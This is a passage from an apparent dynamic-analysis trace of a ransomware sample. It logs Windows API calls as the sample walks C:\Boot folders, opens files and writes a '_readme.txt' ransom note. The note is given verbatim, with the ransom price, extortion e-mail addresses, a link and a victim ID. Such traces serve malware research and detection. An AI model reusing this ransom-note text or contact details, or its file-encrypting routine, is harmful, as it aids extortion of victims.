(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.388] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0183.388] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.388] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.388] PathFindFileNameW (pszPath="") returned="" [0183.388] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.388] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.389] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.389] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.389] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0183.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.389] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0183.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.390] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.390] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.390] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.391] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*" (normalized: "c:\\boot\\da-dk\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.391] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.392] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.392] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0183.392] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.393] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.393] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.394] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.394] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.414] HeapFree (in: hHeap=0x2c0000, 